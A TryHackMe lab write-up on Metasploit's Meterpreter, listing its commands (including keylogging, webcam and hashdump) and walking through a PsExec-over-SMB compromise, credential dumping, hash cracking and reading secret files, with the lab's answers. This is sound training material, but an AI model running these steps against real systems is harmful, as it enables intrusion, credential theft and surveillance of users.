Tryhackme - Metasploit: Meterpreter

TryHackMe — Metasploit: Meterpreter Writeup

Meterpreter is one of the most powerful payloads included in the Metasploit Framework. It provides advanced post-exploitation features that allow penetration testers to interact directly with compromised systems.

This TryHackMe room introduces Meterpreter commands, post-exploitation techniques, credential dumping, file searching, privilege escalation, and system interaction.

Warning: For educational purposes only.

---

Task 1 — Introduction to Meterpreter

Meterpreter runs entirely in memory and acts as an advanced agent inside the target machine.

It allows attackers or penetration testers to:

• Execute commands remotely;
• Interact with the file system;
• Capture credentials;
• Escalate privileges;
• Monitor user activity;
• Perform post-exploitation tasks.

Meterpreter supports multiple target operating systems including:

• Windows;
• Linux;
• Android;
• PHP environments;
• Python environments.

---

Task 2 — Meterpreter Commands

Meterpreter contains several categories of commands used during penetration testing and red team operations.

Core Commands

background
exit
guid
help
info
irb
load
migrate
run
sessions

File System Commands

cd
ls
pwd
edit
cat
rm
search
upload
download

Networking Commands

arp
ifconfig
netstat
portfwd
route

System Commands

clearev
execute
getpid
getuid
kill
pkill
ps
reboot
shell
shutdown
sysinfo

Advanced Post-Exploitation Commands

keyscan_start
keyscan_dump
screenshare
screenshot
record_mic
webcam_snap
getsystem
hashdump

These commands make Meterpreter extremely powerful during post-exploitation operations.

---

Task 3 — Post-Exploitation Challenge

The challenge starts by exploiting SMB using the PsExec module.

Exploit Configuration

use exploit/windows/smb/psexec

set RHOSTS YOUR_MACHINE_IP

set SMBUser ballen

set SMBPass Password1

---

System Enumeration

Q: What is the computer name?

A: ACME-TEST

Q: What is the target domain?

A: FLASH

sysinfo

---

Share Enumeration

Q: What is the name of the share likely created by the user?

A: speedster

use post/windows/gather/enum_shares

show options

sessions -l

set SESSION 1

run

---

Credential Dumping

Q: What is the NTLM hash of the jchambers user?

A: 69596c7aa1e8daee17f8e78870e25a5c

sessions -i 1
hashdump

Q: What is the cleartext password of the jchambers user?

A: Trustno1

The password hash can be cracked using online services such as CrackStation or offline password cracking tools.

---

Searching for Sensitive Files

Q: Where is the "secrets.txt" file located?

A:

c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt

search -f secrets.txt

Q: What is the Twitter password stored inside the file?

A: KDSvbsw3849!

cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"

---

Finding the Real Secret

Q: Where is the "realsecret.txt" file located?

A:

c:\inetpub\wwwroot\realsecret.txt

search -f realsecret.txt

Q: What is the real secret?

A: The Flash is the fastest man alive

cat "c:\inetpub\wwwroot\realsecret.txt"

---

Important Meterpreter Capabilities

• Privilege Escalation;
• Credential Dumping;
• Persistence;
• Keylogging;
• File Exfiltration;
• Remote Command Execution;
• Webcam Access;
• Microphone Recording;
• Pivoting and Port Forwarding.

---

Final Thoughts

This TryHackMe room demonstrates how Meterpreter can be used during real-world post-exploitation scenarios.

Understanding Meterpreter is extremely important for:

• Ethical Hackers;
• Penetration Testers;
• Red Teams;
• Cybersecurity Researchers;
• Threat Hunters;
• Incident Responders.

---

SEO Tags

TryHackMe, Meterpreter, Metasploit, Post Exploitation, Ethical Hacking, Penetration Testing, Cybersecurity, Red Team, Hashdump, PsExec, Windows Exploitation, Credential Dumping, Offensive Security, SMB Exploitation, Meterpreter Commands

I hope this study summary helped you understand Meterpreter and post-exploitation techniques.